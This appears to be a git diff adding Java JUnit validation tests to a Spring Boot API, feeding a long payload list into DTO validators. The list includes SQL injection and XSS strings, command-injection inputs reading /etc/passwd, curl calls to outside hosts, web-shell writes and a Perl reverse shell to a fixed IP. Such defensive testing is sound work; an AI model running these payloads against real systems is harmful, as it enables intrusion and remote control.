XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for PacoteDTOSaveRequest") + public void testSecurityVulnerabilitiesForSave(String text) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest(text, 2.0, text, true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for PacoteDTOSaveRequest") + public void testSecurityVulnerabilitiesForPatch(String text) { + PacoteDTOPatchRequest response = new PacoteDTOPatchRequest(1L,text, 2.0, text, true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -124 + -35 + -1 + 501 + 502 + 56789 + 3214 + 63446 + """) + @DisplayName("Security Test for PacoteBasePrice") + public void testSecurityVulnerabilitiesForPacoteBasePrice(Double value) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest("random name", value,"Random text", true, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + + @ParameterizedTest + @CsvSource(textBlock = + """ + -124 + -14 + -1 + -321 + -345 + -9999 + -3455 + """) + @DisplayName("Security Test for tipoPacote") + public void testSecurityVulnerabilitiesForTipoPacoteId(long tipoPacoteId) { + PacoteDTOSaveRequest response = new PacoteDTOSaveRequest("random name", 2.0,"Random text", true,tipoPacoteId); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + + + + +} \ No newline at end of file diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java new file mode 100644 index 00000000..0d7c3b56 --- /dev/null +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/ReviewDTOSTest.java @@ -0,0 +1,801 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.ReviewDTO.ControllerLayer.ReviewDTOPatchRequest; +import isep.ipp.pt.api.desofs.Dto.ReviewDTO.ControllerLayer.ReviewDTOSaveRequest; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; +import org.springframework.boot.test.context.SpringBootTest; + +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; +@SpringBootTest +class ReviewDTOSTest { + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND 